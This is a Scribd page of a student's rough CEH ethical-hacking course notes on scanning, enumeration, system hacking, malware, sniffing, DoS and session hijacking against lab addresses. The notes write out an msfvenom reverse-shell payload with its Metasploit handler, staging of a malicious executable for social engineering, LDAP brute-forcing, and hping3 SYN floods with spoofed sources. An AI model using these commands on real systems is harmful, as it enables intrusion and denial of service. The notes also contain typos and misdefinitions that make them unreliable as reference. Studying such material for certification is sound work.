Scribd Logo
Upload

Welcome to Scribd!

  • Ceh Session 3

    Uploaded by

    Wasimuddin
    6 views5 pages
    nnnnn

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    nnnnn

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    6 views5 pages

    Ceh Session 3

    Uploaded by

    Wasimuddin
    nnnnn

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    ONE DRIVE LINK:-

    https://onedrive.live.com/?authkey=
    %21AFCcVeaoihlIptE&id=A06B0807E9CEFDF8%21406&cid=A06B0807E9CEFDF8

    3.SCANING NETWORK
    1)port and services need and use to acess host
    2)by scanning port and services we get to known vernarability
    3)ipconfig to know ipv4 address
    4)(ip addr)-> New cmd for ipv4 for linux
    5)(ping) cmd is also use to communicate b/w devices in same network
    6)if i dnt know ip addr of opponent we can use NMAP cmd(use this cmd to permorm
    host discovery)
    7)1st ip addr is network addrs(10.10.1.0) and last ip address (10.10.1.255) is
    broadcast addrs
    8)If you want large machine at quiuck time use cmd (nmap -sn 10.10.1.0/24)
    9)with the help of ttl(time to live) we can know which ip addrs have machine or os
    10)nmap is also help to know machine is server or not
    11)protocol is known as m/c to m/c communication lang
    12)tcp (connection protocol) UDP (user datagram protocol)
    13)(nmap -O 10.10.1.11) by this you can know more detail information about the m/c
    14)-O to know about OS
    15)nmap -O 10.10.1.11 -> this cmd run by root user
    16)arp(address Rosolution protocol)-> use to get mac addrs

    AFTER 9:00 PM

    17)(nmap -A 10.10.1.11) it is give lot of result but very detail manner.


    18)sx is new way scan arp in new version of linux
    19)(net user) is use to known how may user are there in our device
    20)(netstat -on) we can knnown active connection port with mny device
    21)if connection is established but i want close (taskkill /pid NUMBER)
    22) nmap -sV -> scan versiion
    23)hping3 is slitly same like nmap but hping3 have some superpower than nmap
    24)(nmap --script smb-os-discovery.nse)->it can lot of information at once

    4TH MODULE ENUMERATION


    1)nbtstat (net bios statistics) nbtstat -c -> to check connections
    1a)with the help of nbtstat we can do netBios emumeration
    1b)-a displays the NetBIOS name table of a remote computer. nbtstat -a [IP
    address of the remote machine]

    2)nse -> network script engine


    3)snmp protocol work on 161
    4)snmp -check (with this we can check what user is in attacked os by tthis we can
    expose user fully)
    5)ldap -> live dicretory access protocol
    6)ldap -> also known as active directory domain service
    7) nmap -p 389 --script ldap-brute --script-args
    ldap.base='"cn=users,dc=CEH,dc=com"' 10.10.1.22 for username enumeration
    8)Now, we will connect to the target LDAP server without credentials using python.
    {server=ldap3.Server(’[Target IP Address]’, get_info=ldap3.ALL,port=[Target
    Port]) } => for python based ldap enumeration

    MODILE 05 (vulnerability analysis):-


    1)nmap -sV scanning version of traget system
    2)cve = common vulnerability and exposure
    3)

    SYSTEM HACKING (m6)


    1)Link-Local Multicast Name Resolution (LLMNR):-
    is a protocol based on the Domain Name System (DNS) packet format that allows both
    IPv4 and
    IPv6 hosts to perform name resolution for hosts on the same local link.
    It is included in Windows Vista, Windows Server 2008, Windows 7, Windows 8 and
    Windows 10.
    2) ls -l responder.py to see file is access or not
    3) chmod +x responder.py to give permission of acessibility
    4)$john new.txt -> hash decoder
    5)$service apache2 status -> For checking The apache http server
    6)web server :
    7)$service apache2 start -> to start server
    8)$msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe L
    HOST=10.10.1.13 LPORT=4444 -o ghost.exe -> it is use to create payload
    9)$msfconsole -> it is use to work with metasploit all feature of metasploit
    10)$msfconsole its create a backdoor and control victim machine
    11)-p = payload
    12)reverse_tcp = it is like a backdoor which is bypass firewall
    13)$run vnc = to run victim system remotly
    14)sam = security acquired manager
    15)type clac.exe > sample.txt: = it is use hide clac file in sample.txt
    16)mklink super.exe > sample.txt:clac.exe = by clicking super file we directly
    access clac file
    17)$msf console
    17.a) msf6> use exploit/multi/handler
    17.b) msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
    17.c) exploit(multi/handler)> show options = To see what all options are
    there in this payload.
    17.d) exploit(multi/handler)> exploit = To start the reverse tcp handler on
    LHOST:LPORT(means to make paylord in acti0ns)
    $$$SPECIAL$$$
    -----------------------------------------------------------------------------------
    -----------------------------------------------------------------------------------
    -----------------------------------------------------------------------------------
    -----------------------------------------------
    @)In the previous lab, we already created a directory or shared folder (share) at
    the location (/var/www/html) with the required access permission. So, we will use
    the same directory or shared folder (share) to share malicious_payload.exe with the
    victim machine.

    Note: If you want to create a new directory to share the


    malicious_payload.exe file with the target machine and provide the permissions, use
    the below commands:

    Type mkdir /var/www/html/share and press Enter to create a shared


    folder
    Type chmod -R 755 /var/www/html/share and press Enter
    Type chown -R www-data:www-data /var/www/html/share and press Enter
    In the Terminal window, type cp /root/Desktop/malicious_payload.exe
    /var/www/html/share/, and press Enter to copy the file to the shared folder. [ FOR
    SOCIAL ENGINEERING OF MALWARE]
    -----------------------------------------------------------------------------------
    -----------------------------------------------------------------------------------
    -----------------------------------------------------------------------------------
    ------------------------------------------------
    7.MALWARE threats
    1)static malware analysis
    2)dynamic malware analysis
    3)njRat = to bulid trojan in windows
    4)njRat = we can access victims computer
    5)siem Tools is used by mnc
    6)splunk

    8.sniffing
    1)ip soofing using arp(adress resolution protocol).
    2)switch majorly work on mac address
    3)swith have a fifo method
    4)macof helps in mac flooding attack
    5)macof -i eth0-n 10
    6)

    9.SOCIAL ENGINEERING
    1)art of convincing people to self xpose their informaion
    2)$setoolkit = social engg toolkit
    2.1)it help to create phishing website
    3) phishtank = it is a phishing awareness website
    4)netstat extension = It is like antivirus

    10. DOS ATTACK


    1)In this type of authentice user cant access the website because of fake packet
    flood attack
    2)DDOS attack it use botnet for same flood attack for sending huge amount of fake
    packet to targhet server
    3)$ping 10.10.1.11 = to flood attack occurence in target system
    4)$nmap -p 21 10.10.1.11 = to check target sustem port is opened or not
    5)msf6> use auxiliary/dos/tcp/synflood = auxiliary(scanning), for impliment dos
    attack
    6)hping3 -s(syn request) 10.10.1.11 -a(spoofed ip) 10.10.1.22 -p(attacking port) 22
    --flood

    11.SESSION HIJACKING
    1)Once user and server is connected then that is called session
    2)session hijacking = attacker will interfere b/w user and server then attacker
    will communicate with server in the name of genuine user
    3)two type o session hijacking (active & passive)
    3.1) in active seizes control of session
    3.2) in passive attacker is like movie watching audience
    4)ZAP (zed attack proxy) same as like burp suite
    5)for passive :
    $bettercap -iface(interface) eth0
    6) with the wirehark we can deteck session hijacking

    12.EVADING IDS , FIREWALLS AND HONEYPOTS


    1) IDS = It is a software systemor hardware device tht inspects and inbound and
    outbound network traffic
    2)in ids and ips cant block particular ip but firewall can do it
    3)snort tool is open source softeare for network intrusion prevention system
    4)in snort we edit the rules as per our need
    3)ZoneAlarm free firewall
    3.1)It is a software firewaall to monitor our network personally
    3.2)we can block any ip individually
    4)HoneyBOT :
    4.1)Monitor the network packet collecting the Network packet

    13.WEB SERVER
    1) a web server is computer system which is use to store , process and connect to
    internet through http
    2)who.is = it is use to search for domains or ip adresses
    3)ghost_eye is python tool there fopr everfy related to webserver
    4)skipfish : It brute force attack
    the whole website
    5)hydra is tool which ius use to parallelized login cracker which supports numerous
    protocols to attack
    6)$hydra -h
    7)

    14. HACKING WEB APPLICATIONS


    1)web app is interfacve between u\end user an dweb servers
    2)$whatweb www.ethicalhacker.com = This tool can identify and recognize all the web
    technologies available on the target website
    3)load baloancing ($lbd ww.certifiedhacker.com) = checking for http-loadbalancing
    request

    15)
    16)

    17.HACKING MOBILE PLATFORM


    1)one of the vulnerability for mobile hacking is fake mobile tower means spoofing
    mobile network to connect with mobile devices
    2)

    18)
    19)
    20)

    You might also like